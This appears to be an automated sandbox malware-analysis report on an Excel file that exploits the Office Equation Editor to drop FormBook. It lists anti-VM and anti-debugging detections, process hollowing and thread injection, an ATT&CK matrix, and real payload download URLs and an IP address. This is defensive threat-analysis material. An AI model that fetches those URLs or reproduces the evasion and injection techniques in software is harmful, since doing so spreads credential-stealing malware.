      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: Unique food order.xlsxStream path 'EncryptedPackage' entropy: 7.99991703704 (max. 8.0)
      Source: Unique food order.xlsxStream path 'EncryptedPackage' entropy: 7.99991703704 (max. 8.0)

      Malware Analysis System Evasion:

      barindex
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000314F7E second address: 0000000000314F7E instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA1E43643A8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx 0x00000021 test ax, cx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dx, bx 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007FA1E436437Eh 0x00000036 test bx, cx 0x00000039 test ecx, ebx 0x0000003b test bx, cx 0x0000003e call 00007FA1E43643ECh 0x00000043 call 00007FA1E43643BAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] 0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc
      Tries to detect Any.runShow sources
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: vbc.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: vbc.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000314F13 second address: 0000000000314F7E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+000000F8h], 00A95F60h 0x0000000d test al, bl 0x0000000f test bx, cx 0x00000012 test ecx, ebx 0x00000014 test bx, cx 0x00000017 call 00007FA1E43650BCh 0x0000001c call 00007FA1E436508Ah 0x00000021 lfence 0x00000024 mov edx, dword ptr [7FFE0014h] 0x0000002a lfence 0x0000002d ret 0x0000002e mov esi, edx 0x00000030 pushad 0x00000031 rdtsc
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000314F7E second address: 0000000000314F7E instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA1E43643A8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx 0x00000021 test ax, cx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dx, bx 0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007FA1E436437Eh 0x00000036 test bx, cx 0x00000039 test ecx, ebx 0x0000003b test bx, cx 0x0000003e call 00007FA1E43643ECh 0x00000043 call 00007FA1E43643BAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] 0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000314FA0 second address: 0000000000314FA0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA1E436548Dh 0x0000001f popad 0x00000020 call 00007FA1E4365161h 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000001B4FA0 second address: 00000000001B4FA0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA1E46CBC9Dh 0x0000001f popad 0x00000020 call 00007FA1E46CB971h 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile opened / queried: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile opened / queried: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031044B rdtsc 4_2_0031044B
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031044B rdtsc 4_2_0031044B
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2376Thread sleep time: -360000s >= -30000sJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2376Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Users\Public\vbc.exe TID: 3008Thread sleep time: -420000s >= -30000sJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2376Thread sleep time: -360000s >= -30000sJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2376Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Users\Public\vbc.exe TID: 3008Thread sleep time: -420000s >= -30000sJump to behavior
      Source: explorer.exe, 00000007.00000002.2382028961.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000007.00000000.2337992936.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
      Source: explorer.exe, 00000007.00000000.2337947660.00000000041DB000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: vbc.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000007.00000000.2332515395.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
      Source: explorer.exe, 00000007.00000002.2382028961.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000007.00000000.2337992936.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
      Source: explorer.exe, 00000007.00000000.2337947660.00000000041DB000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: vbc.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000007.00000000.2332515395.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
      Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031044B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,000000004_2_0031044B
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031044B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,000000004_2_0031044B
      Hides threads from debuggersShow sources
      Source: C:\Users\Public\vbc.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\Public\vbc.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\Public\vbc.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\Public\vbc.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\Public\vbc.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\Public\vbc.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess queried: DebugPortJump to behavior
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess queried: DebugPortJump to behavior
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031044B rdtsc 4_2_0031044B
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031044B rdtsc 4_2_0031044B
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00312F56 LdrInitializeThunk,4_2_00312F56
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00312F56 LdrInitializeThunk,4_2_00312F56
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003154F4 mov eax, dword ptr fs:[00000030h]4_2_003154F4
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00311C16 mov eax, dword ptr fs:[00000030h]4_2_00311C16
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00314802 mov eax, dword ptr fs:[00000030h]4_2_00314802
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00314CBB mov eax, dword ptr fs:[00000030h]4_2_00314CBB
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315531 mov eax, dword ptr fs:[00000030h]4_2_00315531
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003129C8 mov eax, dword ptr fs:[00000030h]4_2_003129C8
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00311E09 mov eax, dword ptr fs:[00000030h]4_2_00311E09
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00311721 mov eax, dword ptr fs:[00000030h]4_2_00311721
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003154F4 mov eax, dword ptr fs:[00000030h]4_2_003154F4
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00311C16 mov eax, dword ptr fs:[00000030h]4_2_00311C16
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00314802 mov eax, dword ptr fs:[00000030h]4_2_00314802
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00314CBB mov eax, dword ptr fs:[00000030h]4_2_00314CBB
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315531 mov eax, dword ptr fs:[00000030h]4_2_00315531
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003129C8 mov eax, dword ptr fs:[00000030h]4_2_003129C8
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00311E09 mov eax, dword ptr fs:[00000030h]4_2_00311E09
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00311721 mov eax, dword ptr fs:[00000030h]4_2_00311721
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9A26F8 mov eax, dword ptr fs:[00000030h]5_2_1E9A26F8
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B4802 mov eax, dword ptr fs:[00000030h]5_2_001B4802
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B29C2 mov eax, dword ptr fs:[00000030h]5_2_001B29C2
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B5435 mov eax, dword ptr fs:[00000030h]5_2_001B5435
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B5449 mov eax, dword ptr fs:[00000030h]5_2_001B5449
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B5472 mov eax, dword ptr fs:[00000030h]5_2_001B5472
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B548D mov eax, dword ptr fs:[00000030h]5_2_001B548D
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B4CBB mov eax, dword ptr fs:[00000030h]5_2_001B4CBB
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B54B9 mov eax, dword ptr fs:[00000030h]5_2_001B54B9
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B5531 mov eax, dword ptr fs:[00000030h]5_2_001B5531
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020C26F8 mov eax, dword ptr fs:[00000030h]9_2_020C26F8
      Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess token adjusted: DebugJump to behavior
      Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and writeJump to behavior
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\Public\vbc.exeThread register set: target process: 1388Jump to behavior
      Source: C:\Users\Public\vbc.exeThread register set: target process: 1388Jump to behavior
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: 960000Jump to behavior
      Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: 960000Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
      Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000007.00000002.2382028961.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
      Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000007.00000002.2382028961.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Generic DropperShow sources
      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsCommand and Scripting Interpreter1Path InterceptionProcess Injection412Masquerading111OS Credential DumpingSecurity Software Discovery631Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion23LSASS MemoryVirtualization/Sandbox Evasion23Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Process Injection412Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information31LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery22VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 320235 Sample: Unique food order.xlsx Startdate: 19/11/2020 Architecture: WINDOWS Score: 100 48 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus detection for URL or domain 2->52 54 14 other signatures 2->54 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 37 16 2->15         started        process3 dnsIp4 38 wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu 103.125.191.5, 49165, 49166, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->38 32 C:\Users\user\AppData\...\svchost[1].exe, PE32 10->32 dropped 34 C:\Users\Public\vbc.exe, PE32 10->34 dropped 66 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->66 17 vbc.exe 10->17         started        36 C:\Users\user\...\~$Unique food order.xlsx, data 15->36 dropped file5 signatures6 process7 signatures8 40 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 17->40 42 Tries to detect Any.run 17->42 44 Tries to detect virtualization through RDTSC time measurements 17->44 46 2 other signatures 17->46 20 vbc.exe 9 17->20         started        process9 signatures10 56 Modifies the context of a thread in another process (thread injection) 20->56 58 Tries to detect Any.run 20->58 60 Maps a DLL or memory area into another process 20->60 62 3 other signatures 20->62 23 explorer.exe 20->23 injected process11 process12 25 NAPSTAT.EXE 23->25         started        28 autoconv.exe 23->28         started        signatures13 64 Tries to detect virtualization through RDTSC time measurements 25->64 30 cmd.exe 25->30         started        process14

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Unique food order.xlsx25%VirustotalBrowse
      Unique food order.xlsx23%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://103.125.191.5/bin_xMjelaYnr43.binq~f0%Avira URL Cloudsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://103.125.191.5/bin_xMjelaYnr43.binY~f0%Avira URL Cloudsafe
      http://www.%s.com0%URL Reputationsafe
      http://www.%s.com0%URL Reputationsafe
      http://www.%s.com0%URL Reputationsafe
      http://www.%s.com0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://%s.com0%URL Reputationsafe
      http://%s.com0%URL Reputationsafe
      http://%s.com0%URL Reputationsafe
      http://%s.com0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe1%VirustotalBrowse
      http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe100%Avira URL Cloudmalware
      http://treyresearch.net0%URL Reputationsafe
      http://treyresearch.net0%URL Reputationsafe
      http://treyresearch.net0%URL Reputationsafe
      http://treyresearch.net0%URL Reputationsafe
      http://103.125.191.5/bin_xMjelaYnr43.bin0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
      		103.125.191.5
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exetrue
        • 1%, Virustotal, Browse
        • Avira URL Cloud: malware
        		unknown
        http://103.125.191.5/bin_xMjelaYnr43.bintrue
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkvbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpfalse
          		high
          http://103.125.191.5/bin_xMjelaYnr43.binq~fvbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.icra.org/vocabulary/.vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmpfalse
            		high
            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.2332531261.0000000000260000.00000004.00000020.sdmpfalse
              		high
              http://103.125.191.5/bin_xMjelaYnr43.binY~fvbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.%s.comexplorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		low
              http://www.piriform.com/ccleanerexplorer.exe, 00000007.00000000.2337234886.00000000039F4000.00000004.00000001.sdmpfalse
                		high
                http://www.%s.comPAvbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		low
                http://%s.comexplorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		low
                http://windowsmedia.com/redir/services.asp?WMPFriendly=truevbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
